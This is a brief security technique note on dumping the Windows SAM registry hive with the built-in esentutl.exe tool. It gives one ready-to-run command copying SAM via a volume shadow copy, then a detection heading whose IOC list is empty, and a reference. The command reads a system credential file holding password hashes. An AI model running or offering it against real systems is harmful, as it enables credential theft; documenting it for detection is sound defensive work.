Execution

It's possible to use esentutl.exe that comes with Windows and dump SAM/Security hives like so:

esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

Observation

The below are some potential IOCs for detecting this technique:

References

How to dump the Windows SAM file while the system is running?Super User